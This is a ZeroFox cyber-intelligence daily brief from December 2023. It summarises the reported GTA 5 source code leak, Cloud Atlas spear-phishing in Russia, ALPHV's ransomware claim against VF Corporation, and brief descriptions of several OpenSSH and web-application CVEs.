zerofox logo
Advisories

ZeroFox Cyber Intelligence Daily Brief - December 26, 2023

|by Alpha Team

banner image

ZeroFox Cyber Intelligence Daily Brief - December 26, 2023

ZeroFox Intelligence collects, curates, and analyzes information derived from open and proprietary sources. Here is today’s daily roundup to give you and your clients an advantage over the adversary.

Brief Highlights

  • GTA 5 Source Code Reportedly Leaked Online a Year after Rockstar Hack
  • Cloud Atlas' Spear-Phishing Attacks Target Russian Agro and Research Companies
  • ALPHV Targets Apparel-Brands Owner VF Corporation

GTA 5 Source Code Reportedly Leaked Online a Year after Rockstar Hack

The source code for Grand Theft Auto (GTA) 5 was reportedly leaked on numerous channels, including Discord servers and a Telegram channel was previously used to leak stolen Rockstar data. The hackers, suspected to be connected with Lapsus$, posted links to the stolen source code, sharing a screenshot of one of the folders. Following the reduced activity of the Lapsus$ group due to arrests made earlier, suspected members of Lapsus$ are reportedly active in a group called Scattered Spider, employing tactics such as social engineering, phishing, multi-factor authentication fatigue, and SIM swapping attacks to gain initial access to large organizations' networks.

Cloud Atlas' Spear-Phishing Attacks Target Russian Agro and Research Companies

The threat actor Cloud Atlas, also known as Clean Ursa, Inception, Oxygen, and Red October, has been reportedly identified in spear-phishing attacks targeting Russian enterprises, including an agro-industrial enterprise and a state-owned research company. Known for persistent campaigns in Russia and east European countries, Cloud Atlas uses simple yet effective methods and avoids open-source implants to be less discriminating. The attacks involve a malicious HTML application launching Visual Basic Script (VBS) files, and at least 20 Russian organizations have been compromised using a modified version of Pupy RAT, named Decoy Dog, attributed to an advanced persistent threat actor called Hellhounds.

ALPHV Targets Apparel-Brands Owner VF Corporation

On December 25, ZeroFox Intelligence observed ALPHV ransomware gang naming VF Corporation, owner of popular apparel brands including North Face, Vans, Supreme, and Jansport, as a victim on its leak site. The group claims that negotiations with VF corporation have been underway since last week. It says it will hide the leak site post “after 3 days in an effort to reduce speculation,” if the company decides to pay the ransom. On December 15, VF Corporation reported a cybersecurity incident where threat actors had managed to encrypt some of its systems and exfiltrate personal data.

THREAT ACTIVITY: INITIAL-ACCESS BROKERS, DATA BROKERS, AND HACKTIVISTS

VULNERABILITIES

  • CVE-2023-51385: In ssh in OpenSSH before 9.6, OS command injection might occur if a user name or host name has shell metacharacters, and this name is referenced by an expansion token in certain situations. For example, an untrusted Git repository can have a submodule with shell metacharacters in a user name or host name.
  • CVE-2021-41617: sshd in OpenSSH 6.2 through 8.x before 8.8, when certain non-default configurations are used, allows privilege escalation because supplemental groups are not initialized as expected. Helper programs for AuthorizedKeysCommand and AuthorizedPrincipalsCommand may run with privileges associated with group memberships of the sshd process, if the configuration specifies running the command as a different user.

EXPLOITS

  • CVE-2021-21276: Polr is an open source URL shortener. in Polr before version 2.3.0, a vulnerability in the setup process allows attackers to gain admin access to site instances, even if they do not possess an existing account.
  • CVE-2023-0777: Authentication Bypass by Primary Weakness in GitHub repository modoboa/modoboa prior to 2.0.4.

BREACHES

Tags: DIBtlp:green